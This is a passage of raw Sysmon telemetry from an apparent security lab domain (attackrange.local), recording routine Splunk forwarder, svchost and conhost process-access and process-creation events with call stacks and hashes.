Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061308Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.113{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-521D-6063-2901-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061307Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:21.115{7F8C56E7-521D-6063-2901-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000246003Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-521D-6063-B922-00000000AF01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246002Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246001Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246000Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245999Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245998Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245997Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245996Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245995Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245994Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245993Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-521D-6063-B922-00000000AF01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245992Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.613{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-521D-6063-B922-00000000AF01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245991Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.614{CB4067E1-521D-6063-B922-00000000AF01}1472C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245990Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:21.051{CB4067E1-521C-6063-B822-00000000AF01}37923236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061316Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:30:22.472{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=473AAB720C07F7AF8C4C5E1524B1CD80,SHA256=EC02562361FA2358FFE570AA53C11C5313C803128B717378003275CD970F58A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246032Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-521E-6063-BB22-00000000AF01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246031Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246030Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246029Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246028Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246027Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246026Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246025Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246024Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:22.957{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246023Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 